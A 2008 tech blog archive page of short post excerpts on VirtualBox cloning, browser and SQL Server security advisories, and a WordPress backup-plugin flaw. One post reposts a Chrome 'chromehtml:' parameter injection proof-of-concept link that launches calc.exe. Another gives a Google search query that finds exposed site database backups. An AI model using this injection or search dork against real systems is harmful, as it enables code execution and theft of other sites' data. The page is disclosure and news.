Monday, December 29th, 2008
I found out the hard way that you cannot simply copy and paste your .vdi file, rename, and add a second virtual machine to your system. Each VDI file has a unique UUID that a single VirtualBox installation will not duplicate. You have to "clone" it. The screenshot below is ...
Posted in General BS, Hardware, Linux, Networking, Software | No Comments
Tuesday, December 23rd, 2008
Google Chrome Browser (ChromeHTML://) remote parameter injection POC
by Nine:Situations:Group::bellick&strawdog
Site: http://retrogod.altervista.org/
tested against: Internet Explorer 8 beta 2, Google Chrome 1.0.154.36, Microsoft Windows XP SP3
List of command line switches:
http://src.chromium.org/svn/trunk/src/chrome/common/chrome_switches.cc
Original url: http://retrogod.altervista.org/9sg_chrome.html
click the following link with IE while monitoring with procmon
-->
<a href='chromehtml:www.google.com"%20--renderer-path="c:\windows\system32\calc.exe"%20--"'>click me</a>
Source:
http://www.milw0rm.com/exploits/7566
Posted in Coding, Internet, Security, Software | No Comments
Monday, December 22nd, 2008
Microsoft late Monday issued a pre-patch advisory confirming a remote code execution vulnerability affecting its SQL Server line.
The vulnerability, publicly disclosed with exploit code more than two weeks ago, affects Microsoft SQL Server 2000, Microsoft SQL Server 2005, Microsoft SQL Server 2005 Express Edition, Microsoft SQL Server 2000 Desktop Engine ...
Posted in Coding, Internet, Networking, Privacy, Security, Software, Windows | No Comments
Wednesday, December 17th, 2008
Mozilla has issued eight patches for its Firefox Web browser, three of which fix problems classified as critical.
The patches come after security experts have recommended using a browser other than Microsoft's Internet Explorer 7 and older versions of IE due to a dangerous vulnerability. Microsoft is due to release an ...
Posted in Internet, Security, Software | No Comments
Sunday, December 14th, 2008
Older versions of the popular Wordpress plugin WP-DP-Backup leaves the copy of your entire database in a public folder for all to see. The databases were stored in wp-content/backup/ and a quick Google search today still returns many databases of sites, including some as recent as a few days ago:
http://www.google.com/search?num=100&hl=en&suggon=0&safe=off&q=intitle%3A%22index+of+%2Fwp-content%2Fbackup%22&btnG=Search
For ...
Posted in Coding, Internet, Privacy, Security, Software | No Comments
